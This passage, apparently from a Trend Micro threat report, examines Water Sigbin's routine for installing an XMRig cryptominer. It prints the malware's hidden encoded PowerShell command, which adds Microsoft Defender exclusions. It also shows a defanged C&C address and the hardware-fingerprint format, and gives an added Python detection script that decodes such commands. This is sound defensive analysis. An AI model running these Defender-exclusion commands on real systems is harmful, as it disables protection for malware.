Trend Micro Inc.

06/28/2024 | News release | Distributed by Public on 06/27/2024 22:40

Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer

The Base64-encoded PowerShell command (passed with -enc, which takes the script as UTF-16LE text encoded in Base64) is as follows:

Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGU[... base64 encoded characters ...] aQB6AGUAZAAuAGUAeABlAA==

Its decoded value, which adds both the dropped IsSynchronized.exe and the .NET AddInProcess.exe binary to Microsoft Defender's path and process exclusion lists, is:

Add-MpPreference -ExclusionPath C:\Users\$USERNAME$\AppData\Roaming\Name\IsSynchronized.exe,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -Force;

Add-MpPreference -ExclusionProcess C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe,C:\Users\$USERNAME$\AppData\Roaming\Name\IsSynchronized.exe

Next, the malware attempts to establish a connection with its C&C server at 89.185.85[.]102:9091. For each victim, it generates a unique identifier from collected hardware information: the values are concatenated in a fixed format and then hashed with MD5 (MD5 is a one-way hash, not encryption, so the identifier is a host fingerprint rather than data the server decrypts).

The following is the format of the collected data.

[Processor ID]-[Disk Drive Signature]-[Disk Drive Serial Number]-[Baseboard Serial Number]-[Model or Name of GPU]-[Username]
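As an added example (not Trend Micro's code and not the malware's own), the Python below reproduces the two pieces of the routine described above from the defender's side: it decodes a -enc/-EncodedCommand argument (PowerShell expects the script as UTF-16LE Base64, so a UTF-8 decode yields garbage) and pulls out the Defender exclusions the script adds, and it builds the victim identifier in the format listed above and hashes it with MD5. The encoded blob is re-encoded from the page's decoded text because the page truncates the real one; the username "victim", the hardware values, the bare "-" separator and the lowercase hex digest are assumptions.

```python
import base64
import hashlib
import re
from typing import Dict, List, Optional

# Constructed stand-ins for the page's placeholders: "victim" replaces $USERNAME$.
ISYNC = r"C:\Users\victim\AppData\Roaming\Name\IsSynchronized.exe"
ADDIN = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"

# The decoded payload, reconstructed from the article's plaintext. The page
# truncates the real Base64 blob, so it is re-encoded below rather than copied.
DECODED_SAMPLE = (
    f"Add-MpPreference -ExclusionPath {ISYNC},{ADDIN} -Force;"
    f"Add-MpPreference -ExclusionProcess {ADDIN},{ISYNC}"
)


def encode_powershell(script: str) -> str:
    """-EncodedCommand takes Base64 of the script as UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line in the shape of the one on the page.
SAMPLE_CMDLINE = (
    "Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc "
    + encode_powershell(DECODED_SAMPLE)
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so match every "-e..." switch and keep the one whose name is such a prefix
# and whose argument actually decodes.
_SWITCH = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -enc/-EncodedCommand, or None."""
    for switch, blob in _SWITCH.findall(cmdline):
        if not "encodedcommand".startswith(switch.lower()):
            continue  # e.g. -ExecutionPolicy
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:
            continue
        return raw.decode("utf-16-le", errors="replace")
    return None


# Add-MpPreference -Exclusion{Path,Process,Extension} a,b,c ; the comma list is
# assumed to contain no spaces (quoted paths with spaces would need a real tokenizer).
_EXCLUSION = re.compile(
    r"Add-MpPreference\s+-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+(\S+)",
    re.IGNORECASE,
)


def defender_exclusions(script: str) -> Dict[str, List[str]]:
    """Map each exclusion type to the entries the script adds to Defender."""
    found: Dict[str, List[str]] = {}
    for kind, csv in _EXCLUSION.findall(script):
        entries = [e.strip().strip('"\'') for e in csv.split(",")]
        found.setdefault(kind, []).extend(e for e in entries if e)
    return found


def analyze_cmdline(cmdline: str) -> Dict[str, object]:
    """Detection view of one process command line: the decoded script plus any
    Defender exclusions it adds, which is the tell for this stage of the chain."""
    script = decode_encoded_command(cmdline)
    exclusions = defender_exclusions(script) if script else {}
    return {
        "decoded": script,
        "exclusions": exclusions,
        "defender_tampering": bool(exclusions),
    }


def victim_id(processor_id: str, disk_signature: str, disk_serial: str,
              baseboard_serial: str, gpu_name: str, username: str) -> str:
    """Victim identifier in the article's field order, MD5-hashed to hex.
    That the sample joins with a bare '-' and emits lowercase hex is an assumption."""
    raw = "-".join([processor_id, disk_signature, disk_serial,
                    baseboard_serial, gpu_name, username])
    return hashlib.md5(raw.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    report = analyze_cmdline(SAMPLE_CMDLINE)
    print(report["decoded"])
    print(report["exclusions"])
    # Constructed hardware values, not taken from any real host.
    print(victim_id("BFEBFBFF000906EA", "2A8D4F10", "S3Z9NB0K",
                    "MB-0001", "NVIDIA GeForce GTX 1660", "victim"))
```

Run over process-creation telemetry (Sysmon event ID 1 or Windows 4688 with command-line logging), `analyze_cmdline` flags any encoded PowerShell that touches Add-MpPreference, which is a high-signal event on its own; `victim_id` lets a responder recompute the fingerprint for a known host to correlate it with traffic seen toward the C&C port.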

The following code snippet shows the collection of the aforementioned information: